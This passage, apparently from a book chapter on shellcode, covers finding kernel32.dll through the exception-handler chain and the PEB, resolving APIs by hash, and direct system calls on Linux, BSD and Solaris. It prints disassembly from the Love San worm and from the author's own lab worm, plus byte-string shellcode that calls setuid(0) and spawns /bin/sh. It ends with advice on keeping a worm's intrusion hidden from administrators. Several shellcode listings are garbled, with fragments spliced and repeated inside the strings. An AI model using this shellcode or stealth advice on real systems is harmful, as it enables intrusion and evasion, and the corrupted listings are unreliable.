The possibility of calling system functions is not a mandatory condition of a successful attack, because the vulnerable program already contains everything required for the attack, including calls to the system functions and the high-level wrapper of the application libraries. Having disassembled the application being investigated and determined the addresses of the required function, it is possible to use the following constructs: call target address , push return address /jmp relative address , or mov register, absolute target address /push return address / jmp register .
The attacker position is favorable if the vulnerable program imports the LoadLibrary and GetProcAddress functions, because the shellcode will be able to load any DLL and call any of its functions. What if there is no GetProcAddress in the import table? In this case, the attacker will have to independently determine the addresses of the required functions, using the base load address returned by the LoadLibrary function, which acts either by manually parsing the Portable Executable (PE) file or by identifying the functions by their signatures. The first approach is too complicated, and the second one is unreliable. It is intolerable to rely on the fixed addresses of the system functions because they depend on the version of the operating system.
What could be done if the LoadLibrary function is missing from the import table and one or more system functions required for the shellcode propagation are missing? In UNIX systems, it is possible to use the direct call to the kernel functions implemented either by the interrupt at the 80h vector (in Linux and FreeBSD, parameters are passed through the registers) or by the far call at the 0007h:00000000h address (in System V, parameters are passed through the stack). This approach is the best. The numbers of the system calls are contained in the /usr/include/sys/syscall.h file (see also the section " Implementing System Calls in Different Operating Systems " ). Also, recall the syscall and sysenter machine commands, which, according to their "speaking names ," carry out direct system calls, along with passing parameters. In Windows NT-like operating systems, the situation is more difficult. All interactions with the kernel are carried out by the int 2Eh interrupt, unofficially called native API. Some information on this topic can be found in the legendary " Interrupt List " by Ralf Brown ( http://www.cfyme.com/rbrown.htm ) and Windows NT/2000 Native API Reference by Gary Nebbett; however, this information is not enough. This interface is extremely sparingly documented, and for now the only way to get information about it is analyzing the disassembled listings of kernel32.dll and ntdll.dll. Working with native API requires a high-level professional skill and detailed knowledge of the operating system architecture. The Windows NT kernel operates with a small number of low-level functions. These functions are not suitable for direct use and, like any "semi-product," must be prepared as appropriate. For example, the Load-Library function is "split" into at least two system calls ” NtCreateFile (EAX == 17h) opens a file, and NtCreateSection (EAX == 2Bh) maps that file to the memory (in other words, it works like the CreateFileMapping function), after which NtClose (EAX == 0Fh) closes the descriptor. The GetProcAddress function is entirely implemented within ntdll.dll, and there is no trace of it in the kernel. Nevertheless, it is included in the platform SDK and MSDN, so if the PE specification is at hand, the export table can be analyzed manually.
On the other hand, there is no need to access the kernel to choose the "emulator" of the LoadLibrary function, because the ntdll.dll and kernel32.dll libraries are always present in the address space of any process. Thus, if the hacker determines the addresses, at which they load, then the goal is achieved. I know two methods of solving this problem ” using the system structured exception handler and using the PEB. The first approach is self-evident but bulky and inelegant. The second approach is elegant but unreliable. However, the latter circumstance didn't prevent the Love San worm from propagating itself over millions of machines.
If in the course of application execution an exception arises (such as division by zero or access to a nonexistent memory page) and the application doesn't handle this situation on its own, then the system handler takes control. The system handler is usually implemented within kernel32.dll. In Windows 2000 Service Pack 3, this handler is located at the 77EAl856h address. This address depends on the version of the operating system; therefore, expertly-designed shellcode must automatically determine the handler address. There is no need to cause an exception and trace the code, as was usual in the time of good old MS-DOS. It is much better to investigate the chain of structured exception handlers packed within the EXCEPTION_REGISTRATION structure. The first double word of such handlers contains the pointer to the next handler (or the FFFFFFFFh value if there are no more handlers), and the second double word contains the address of the current handler (Listing 10.6).
_EXCEPTION_REGISTRATION struc prev dd ? handler dd ? _EXCEPTION_REGISTRATION ends
The first element of the chain of handlers is stored at the FS: [00000000h] address, and all the further ones reside directly in the address space of the process being investigated. Moving from element to element, it is possible to view all handlers until the element is encountered , in which the prev field contains the FFFFFFFFFh value. In this case, the handler field of the previous element will contain the address of the system handler. Unofficially, this mechanism is called " unwinding the structured exceptions stack." For more information on this topic, read " A Crash Course on the Depths of Win32 Structured Exception Handling " by Matt Pietrek (it is included in MSDN, see http://msdn.microsoft.com/msdnmag/issues/03/06/WindowsServer2003/default.aspx ).
Listing 10.7 provides an illustration of this mechanism. The code of this example returns the address of the system handler to the EAX register.
.data:00501007 XOR EAX, EAX ; EAX := 0 .data:00501009 XOR EBX, EBX ; EBX := 0 .data:0050100B MOV ECX, fs:[EAX + 4] ; Handler address .data:0050100F MOV EAX, fs:[EAX] ; Pointer to the next handler .data:00501012 JMP short loc_501019 ; Check the loop condition. .data:00501014 ; ---------------------------------------------------- .data:00501014 loc_501014: .data:00501014 MOV EBX, [EAX + 4] ; Handler address .data:00501017 MOV EAX, [EAX] ; Pointer to the next handler .data:00501019 .data:00501019 loc_501019: .data:00501019 CMP EAX, OFFFFFFFFh ; Is this the last handler? .data:0050101C JNZ short loc_501014 ; Loop until the loop ; condition is satisfied.
If at least one address belonging to the kernel32.dll is known to the hacker, then it will not be difficult to determine its base load address (it is a multiple of 1000h and contains in its beginning the NewExe header, which can be easily recognized by the MZ and PE signatures. The code provided in Listing 10.8 accepts the address of the system loader into the EBP register and returns the load address of the kernel32.dll in the same register.
001B:0044676C CMP WORD PTR[EBP+00], 5A4D ; Is this MZ? 001B:00446772 JNZ 00446781 ; No, it isn't. 001B:00446774 MOV EAX, [EBP + 3C] ; To PE header 001B:00446777 CMP DWORD PTR [EAX + EBP + 0], 4550 ; Is this PE? 001B:0044677F JZ 00446789 ; Yes, it is. 001B:00446781 SUB EBP, 00010000 ; Next 1K block 001B:00446787 LOOP 0044676C ; Loop 001B:00446789 ...
There is an even more elegant method of determining the base load address of the kernel32.dll library based on PEB, the pointer to which is contained in the double word located at the FS:[00000030h] address. The structure of the PEB is shown in Listing 10.9.
PEB STRUC PEB_InheritedAddressSpace DB ? PEB_ReadImageFileExecOptions DB ? PEB_BeingDebugged DB ? PEB_SpareBool DB ? PEB_Mutant DD ? PEB_ImageBaseAddress DD ? PEB_PebLdrData DD PEB_LDR_DATA PTR ? ; +0Ch ... PEB_SessionId DD ? PEB
By the OCh offset, PEB contains the pointer to the PEN_LDR_DATA structure, representing the list of loaded DLLs, listed according to the order of their initialization. The ntdll.dll library is the first to initialize, and kernel32.dll follows it. The PEN_LDR_DATA structure is shown in Listing 10.10.
PEB_LDR_DATA STRUC PEB_LDR_cbsize DD ? ; +00 PEB_LDR_Flags DD ? ; +04 PEB_LDR_Unknown8 DD ? ; +08 PEB_LDR_InLoadOrderModuleList LIST_ENTRY ? ; +OCh PEB_LDR_InMemoryOrderModuleList LIST_ENTRY ? ; +14h PEB_LDR_InInitOrderModuleList LIST_ENTRY ? ; +1Ch PEB_LDR_DATA ENDS LIST_ENTRY STRUC LE_FORWARD DD *forward_in_the_list ; + 00h LE_BACKWARD DD *backward_in_the_list ; + 04h LE_IMAGE_BASE DD imagebase_of_ntdll.dll ; + 08h ... LE_IMAGE_TIME DD imagetimestamp ; + 44h LIST_ENTRY
In general, the idea consists of reading the double word at the FS: [00000030h] address, converting it into the pointer to PEB, and jumping to the address referenced by the pointer located at the 0Ch offset ” InInitOrderModuleList. Having discarded the first element, belonging to ntdll.dll, it is possible to obtain the pointer to LIST_ENTRY, which contains the characteristics of kernel32.dll (in particular, the base load address is stored in the third double word). It is much easier to program this algorithm then to describe doing so. The preceding description easily fits within five Assembly commands.
Listing 10.11 shows the code fragment from the Love San worm, a dangerous thread to the Internet. This fragment has no relation to the author of the worm. On the contrary, it was borrowed from third-party sources. This is indicated by the presence of "extra" Assembly commands intended for compatibility with Windows 9 x (for which the situation is different from the one that exists in Windows NT). The natural habitat of the Love San worm is limited to Windows NT-like systems, and it is unable to infect Windows 9 x systems.
data:004046FE 64 Al 30 00 00 MOV EAX, large fs:30h ;PEB base data:00404704 85 C0 TEST EAX, EAX ; data:00404706 78 0C JS short loc_404714 ; Windows9x data:00404708 8B 40 0C MOV EAX, [EAX + 0Ch] ; PEB_LDR_DATA data:0040470B 8B 70 1C MOV ESI, [EAX + 1Ch] ; The first element of ; IninitOrderModuleList data:0040470E AD LODSD ; Next element data:0040470F 8B 68 08 MOV EBP, [EAX + 8] ; Base address of ; kemel32.dll data:00404712 EB 09 JMP SHORT loc_40471D data:00404714 ; ------------------------------------------------------------ data:00404714 loc_404714: ; CODE XREF: kk_get_kernel32 + A j data:00404714 8B 40 34 MOV EAX, [EAX + 34h] data:00404717 8B A8 B8 00 00+ MOV EBP, [EAX + 0B8h] data:00404717 data:0040471D loc_40471D: ; CODE XREF: kk_get_kerenel32 + 16 j
The code fragment in Listing 10.11 is responsible for determining the base load address of kernel32.dll and ensuring that the worm is practically independent on the version of the attacked operating system.
Manual parsing of the PE format, however scaringly it sounds, can be implemented easily. The double word, located at the 3Ch offset from the beginning of the base load address, contains the offset (not the pointer) of the PE file header. This header, in turn , contains the offset of the export table in the double word 78h, where bytes 18h to 1Bh and 20h to 23h store the number of exported functions and the offset of exported names, respectively (although functions are exported by ordinals, the offset of the export table is located in bytes 24h to 27h ). Memorize these values ” 3Ch, 78h, 20h/24h. Because they are frequently encountered when investigating the code of worms and exploits, doing so will considerably simplify identification of their algorithms. For example, the fragment of the Love San worm responsible for determining the address of the table of exported names is provided in Listing 10.12.
.data:00404728 MOV EBP, [ESP + arg_4] ; Base load address of kernel32 .data:0040472C MOV EAX, [EBP + 3Ch] ; To PE header .data:0040472F MOV EDX, [EBP + EAX + 78h] ; To the export table .data:00404733 ADD EDX, EBP .data:00404735 MOV ECX, [EDX + 18h] ; Number of exported functions .data:00404738 MOV EBX, [EDX + 20h] ; To the table of exported names .data:0040473B ADD EBX, EBP ; Address of the table ; of exported names
Now, based on the address of the table of exported names (which in a rough approximation represents an array of the text ASCIIZ strings, each of which corresponds to an appropriate API function), it is possible to obtain all the required information. However, a character-by-character comparison is inefficient, and hackers often abandon it. This is because, first, the names of most API functions are too bulky while the shellcode is strictly limited in size . Second, explicit load of API functions considerably simplifies the analysis of the shellcode algorithms. On the other hand, the algorithm of hash comparison is free from all these drawbacks. In general, it is reduced to the convolution of the compared strings by some function f. Detailed information about this algorithm can be found in specialized literature (for instance, see The Art of Computer Programming by Donald Knuth). Here, only the code supplied with detailed comments will be provided (Listing 10.13).
.data:0040473D loc_40473D: ; CODE XREF: kk_get_proc_adr + 36j .data:0040473D JECXZ short loc_404771 ; Error .data:0040473F DEC ECX ; ECX contains the list ; of exported functions. .data:00404740 MOV ESI, [EBX + ECX*4] ; Offset of the end of the array ; of exported functions .data:00404743 ADD ESI, EBP ; Address of the end of the array ; of exported functions .data:00404745 XOR EDI, EDI ; EDI := 0 .data:00404747 CLD ; Reset the direction flag. .data:00404748 .data:00404748 loc_404748: ; CODE XREF: kk_get_proc_adr+30 j .data:00404748 XOR EAX, EAX ; EAX:= 0 .data:0040474A LODSB ; Read the next character ; of the function name. .data:0040474B CMP AL, AH ; Is this the end of the string? .data:0040474D JZ short loc_404756 ; If this is the end, ; then jump to the end. .data:0040474F OR EDI, 0Dh ; Hash the function name .data:00404752 ADD EDI, EAX ; and accumulate the hash sum ; in the EDI register. .data:00404754 JMP short loc_404748 ; .data:00404756 loc_404756: ; CODE XREF: kk_get_proc_adr + 29 j .data:00404756 CMP EDI, [ESP + ARG_0] ; Is this the hash of the function? .data:0040475A JNZ short loc_40473D ; If no, continue testing.
Knowing the address of the target function in the export table, it is easy to determine its address. For example, this can be done as shown in Listing 10.14.
.data:0040475C MOV EBX, [EDX + 24h] ; Offset of the exported ordinals table .data:0040475F ADD EBX, EBP ; Address of the ordinals table .data:00404761 MOV CX, [EBX + ECX*2] ; Get the index within the ordinals table. .data:00404765 MOV EBX, [EDX + 1Ch] ; Offset of the exported addresses table .data:00404768 ADD EBX, EBP ; Address of the exported addresses table .data:0040476A MOV EAX, [EBX + ECX*4] ; Get the offset of the function by index. .data:0040476D ADD EAX, EBP ; Get the function address.
The mechanism of system calls is the background of the operating system, or its internal "kitchen," which is not always well documented. Inside the worm, some constants and commands are floating, which in a sophisticated manner manipulate registers. However, the physical meaning of what is going on remains unclear.
The family of UNIX-like operating systems overwhelms everyone with their variety, complicating the development of portable shellcodes to the extreme. At least six methods of organizing the interface with the kernel are used, including far call by selector 7 offset 0 (HP-UX/PA-RISC, Solaris/x86, xBSD/x86), syscall (IRIX/MIPS), ta8 (Solaris/SPARC), svca (AIX/Power/PowerPC), INT 25h (BeOS/x86), and INT 80h (xBSD/x86, Linux/x86). The order of passing parameters and the number of system calls are different for different operating systems. Some systems are listed twice, which means that they use hybrid mechanisms of system calls. It is inexpedient and simply impossible to describe every system in detail here, because doing so would take too much space. Furthermore, this information was long ago provided in " UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes " by the Last Stage of Delirium Research Group ( http://opensores.thebunker.net/pub/mirrors/blackhat/presentations/bh-usa-01/LSD/bh-usa-01-lsd.pdf ).
Yes! This is the same legendary hacker group that found a hole in Remote Procedure Call (RPC). They are real experts and excellent programmers. The preceding manual is highly recommended to code diggers in general and investigators of viruses and worms in particular.
Provided in Listing 10.15 is the fragment of the mworm lab worm, which I developed after reading their documentation. This worm demonstrates the technique of using system calls under xBSD/x86 (see also Fig. 10.1).
data:0804F860 x86_fbsd_shell: ; EAX := 0 data:0804F860 31 C0 XOR EAX, EAX data:0804F862 99 CDQ ; EDX : = 0 data:0804F863 50 PUSH EAX data:0804F864 50 PUSH EAX data:0804F865 50 PUSH EAX data:0804F866 B0 7E MOV AL, 7Eh data:0804F868 CD 80 INT 80h ; LINUX - sys_sigprocmask data:0804F86A 52 PUSH EDX ; Terminating zero data:0804F86B 68 6E 2F 73 68 PUSH 68732F6Eh ; ..n/sh data:0804F870 44 INC ESP data:0804F871 68 2F 62 69 6E PUSH 6E69622Fh ; /bin/n.. data:0804F876 89 E3 MOV EBX, ESP data:0804F878 52 PUSH EDX data:0804F879 89 E2 MOV EDX, ESP data:0804F87B 53 PUSH EBX data:0804F87C 89 El MOV ECX, ESP data:0804F87E 52 PUSH EDX data:0804F87F 51 PUSH ECX data:0804F880 53 PUSH EBX data:0804F881 53 PUSH EBX data:0804F882 6A 3B PUSH 3Bh data:0804F884 58 POP EAX data:0804F885 CD 80 INT 80h ; LINUX - sys_olduname data:0804F887 31 C0 Xor EAX, EAX data:0804F889 FE C0 INC AL data:0804F88B CD 80 INT 80h ; LINUX - sys_exit
The system call is carried out using the trap, raised by the ta 8 machine command. The number of the system call is passed using the G1 register, and arguments are passed using the 00, 01, 02, 03, and 04 registers. The list of numbers of the most widely-used system functions is provided in Listing 10.16. Listing 10.17 provides an example of shellcode demonstrating the use of system calls under Solaris/SPARC.
Syscall %g1 %o0, %o1, %o2, %o3, %o4 Exec 00Bh path = "/bin/ksh", [ a0 = path,0] Exec 00Bh path = "/bin/ksh", [ a0 = path, al= "-c" a2 = cmd, 0] Setuid 017h uid = 0 Mkdir 050h path = "b..", mode = (each value is valid) Chroot 03Dh path = "b..", "." Chdir 00Ch path = ".." Ioctl 036h sfd, TI_GETPEERNAME = 5491h, [mlen = 54h, len = 54h, sadr = []] so_socket 0E6h AF_INET = 2, SOCK_STREAM = 2, prot =0, devpath = 0, SOV_DEFAULT = 1 bind 0E8h sfd, sadr = [33h, 2, hi, lo, 0, 0, 0, 0], len=10h, SOV_SOCKSTREAM = 2 listen 0E9h sfd, backlog = 5, vers = (not required in this syscall) accept 0EAh sfd, 0, 0, vers = (not required in this syscall) fcntl 03Eh sfd, F_DUP2FD = 09h, fd = 0, 1, 2
char shellcode[]= /* 10*4+8 bytes */ "\x20\xbf\xff\xff" /* bn, a <shellcode-4> ; \ */ "\x20\xbf\xff\xff" /* bn, a <shellcode> ; +- the current command ; pointer in %o7 */ "\x7f\xff\xff\xff" /* call <shellcode+4> ; / */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 ; %o0 contains the pointer ; to /bin/ksh. */ "\x92\x02\x20\x10" /* add %o0,16,%o1 ; %ol contains the pointer ; to free memory. */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] ; Place terminating zero ;into /bin/ksh. */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] ; Reset the memory to zero ; by the %o1 pointer. */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] ; The same */ "\x82\x10\x20\x0b" /* mov 0x0b,%gl ; Number of the exec ; system function */ "\x91\xd0\x20\x08" /* ta 8 ; Call the exec function. */ "/bin/ksh";
The system call is carried out using the far call gateway at the 007:00000000 address (selector 7 offset 0). The number of the system call is passed using the EAX register, and arguments are passed through the stack, the leftmost argument being the last to be pushed into the stack. The function being called must clear the stack on its own. The list of numbers of the most widely-used system functions is provided in Listing 10.18. Listing 10.19 provides an example of shell-code demonstrating the use of system calls under Solaris/x86.
syscall %eax stack exec 0Bh RET, path = "/bin/ksh", [ a0 = path, 0] exec 0Bh RET, path = "/bin/ksh", [ a0 = path, al = "-c", a2 = cmd, 0] setuid 17h RET, uid = 0 mkdir 50h RET, path = "b..", mode = (each value is valid) chroot 3Dh RET, path = "b..","." chdir OCh RET, path = ".." ioctl 36h RET, sfd, TI_GETPEERNAME = 5491h, [mlen = 91h, len = 91h, adr = []] so socket E6h RET, AF_INET = 2,SOCK STREAM = 2, prot = 0,devpath = 0,SOV DEFAULT = 1 bind E8h RET, sfd, sadr = [FFh, 2, hi, lo, 0,0,0,0],len = 10h,SOV_SOCKSTREAM = 2 listen E9h RET, sfd, backlog = 5, vers = (not required in this syscall) accept Eah RET, sfd, 0, 0, vers = (not required in this syscall) fcntl 3Eh RET, sfd, F_DUP2FD = 09h, fd = 0, 1, 2
char setuidcode[]= /* 7 bytes */ "\x33\xc0" /* XORL %EAX, %ERX ; ERX := 0 */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\xb0\x17" /* MOVBchar setuidcode[]= /* 7 bytes */ "\x33\xc0" /* XORL %EAX, %ERX ; ERX := 0 */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\xb0\x17" /* MOVB $0x17, %AL ; Setuid system function number */ "\xff\xd6" /* CALL *%ESI ; setuid(0) */x17, %AL ; Setuid system function number */ "\xff\xd6" /* CALL *%ESI ; setuid(0) */
The system call is carried out through a software interrupt at vector 80h, raised by the int 80h machine instructions. The number of the system call is passed through the EAX register, and arguments are passed through the EBX, ECX, and EDX registers. The list of numbers of the most widely-used system functions is provided in Listing 10.20. Listing 10.21 provides an example of shellcode demonstrating the use of system calls under Linux/x86.
Syscall %EAX %EBX, %ECX, %EDX exec 0Bh path = "/bin//sh", [ a0 = path, 0] exec 0Bh path = "/bin//sh", [ a0 = path, al = "-c", a2 = cmd, 0] setuid 17h uid = 0 mkdir 27h path = "b..", mode = 0 (each value is valid) chroot 3Dh path = "b..", "." chdir 0Ch path = ".. " socketcall 66h getpeername = 7, [sfd, sadr = [], [len = 10h]] socketcall 66h socket = 1, [AF_INET = 2, SOCK STREAM = 2,prot = 0] socketcall 66h bind = 2, [sfd, sadr = [FFh, 2, hi, lo, 0, 0, 0, 0], len = 10h] socketcall 66h listen = 4, [sfd, backlog = 102] socketcall 66h accept = 5, [sfd, 0, 0] dup2 3Fh sfd, fd = 2, 1, 0
char setuidcode[]= /* 8 bytes */ "\x33\xc0" /* XORL %EAX, %ERX ; ERX := 0 */ "\x31\xdb" /* XORL %EBX, %EBX ; EBX := 0 */ "\xb0\x17" /* MOVBchar setuidcode[]= /* 8 bytes */ "\x33\xc0" /* XORL %EAX, %ERX ; ERX := 0 */ "\x31\xdb" /* XORL %EBX, %EBX ; EBX := 0 */ "\xb0\x17" /* MOVB $0X17, %AL ; Number of the stuid system function */ "\xcd\x80" /* INT $0x80 ; setuid(0) */X17, %AL ; Number of the stuid system function */ "\xcd\x80" /* INTchar setuidcode[]= /* 8 bytes */ "\x33\xc0" /* XORL %EAX, %ERX ; ERX := 0 */ "\x31\xdb" /* XORL %EBX, %EBX ; EBX := 0 */ "\xb0\x17" /* MOVB $0X17, %AL ; Number of the stuid system function */ "\xcd\x80" /* INT $0x80 ; setuid(0) */x80 ; setuid(0) */
Operating systems from the BSD family implement a hybrid mechanism of calling system functions: they support both the far call to the 0007:00000000 address (however, the numbers of system functions are different) and the interrupt at vector 80h . Arguments in both cases are passed through the stack. The list of numbers of the most widely-used system functions is provided in Listing 10.22. Listing 10.23 provides an example of shellcode demonstrating the use of system calls under BSD/x86.
Syscall %EAX stack Execve 3Bh RET, path = "//bin//sh", [ a0 = 0], 0 Execve 3Bh RET, path = "//bin//sh", [ a0 = path, al = "-c", a2 = cmd, 0] 0 Setuid 17h RET, uid = 0 Mkdir 88h RET, path = "b..", mode = (each value is valid) Chroot 3Dh RET, path = "b..", "." Chdir 0Ch RET, path=" . . " Getpeername 1Fh RET, sfd, sadr = [], [len = 10h] Socket 61h RET, AF_INET = 2, SOCK_STREAM = 1, prot = 0 Bind 68h RET, sfd, sadr = [FFh, 2, hi, lo, 0, 0, 0, 0], [10h] Listen 6Ah RET, sfd, backlog = 5 Accept 1Eh RET, sfd, 0, 0 dup2 5Ah RET, sfd, fd = 0, 1, 2
char shellcode[]= /* 23 bytes */ "\x31\xc0" /* XORL %EAX, %EAX ; EAX := 0 */ "\x50" /* PUSHL %EAX ; Push the terminating zero into ; the stack. */ "\x68""//sh" /* PUSHLchar shellcode[]= /* 23 bytes */ "\x31\xc0" /* XORL %EAX, %EAX ; EAX := 0 */ "\x50" /* PUSHL %EAX ; Push the terminating zero into ; the stack. */ "\x68""//sh" /* PUSHL $0x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHL $0x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVB $0x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INT $0x80 ; execve("//bin//sh", "",0); */x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHLchar shellcode[]= /* 23 bytes */ "\x31\xc0" /* XORL %EAX, %EAX ; EAX := 0 */ "\x50" /* PUSHL %EAX ; Push the terminating zero into ; the stack. */ "\x68""//sh" /* PUSHL $0x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHL $0x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVB $0x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INT $0x80 ; execve("//bin//sh", "",0); */x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVBchar shellcode[]= /* 23 bytes */ "\x31\xc0" /* XORL %EAX, %EAX ; EAX := 0 */ "\x50" /* PUSHL %EAX ; Push the terminating zero into ; the stack. */ "\x68""//sh" /* PUSHL $0x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHL $0x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVB $0x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INT $0x80 ; execve("//bin//sh", "",0); */x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INTchar shellcode[]= /* 23 bytes */ "\x31\xc0" /* XORL %EAX, %EAX ; EAX := 0 */ "\x50" /* PUSHL %EAX ; Push the terminating zero into ; the stack. */ "\x68""//sh" /* PUSHL $0x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHL $0x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVB $0x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INT $0x80 ; execve("//bin//sh", "",0); */x80 ; execve("//bin//sh", "",0); */
Recovery of the usability of the vulnerable program after overflow is not only a guarantee of keeping the intrusion a secret but also an indicator of a certain level of culture. Having accomplished its mission, the worm must not return control to the host program, because it will almost certainly crash (the probability of the crash is close to one), which will make an administrator suspicious.
If every new TCP/IP connection is processed by a vulnerable program in a separate thread, then for the virus it will be enough to simply kill its thread by calling the TerminateThread API function. It is also possible to enter an endless loop (however, on a uniprocessor machine the CPU load might grow to 100%, which also raises suspicions).
With single-threaded applications, the situation is more difficult. The worm must on its own "manually" recover the damaged data in a workable form, or unwind the stack. It must emerge somewhere in the parent function, which is not touched by corruption yet, or even pass control to some dispatcher function involved in sending messages.
For the moment, no universal techniques have been invented, although during recent years this topic is has been actively discussed and is being worked out.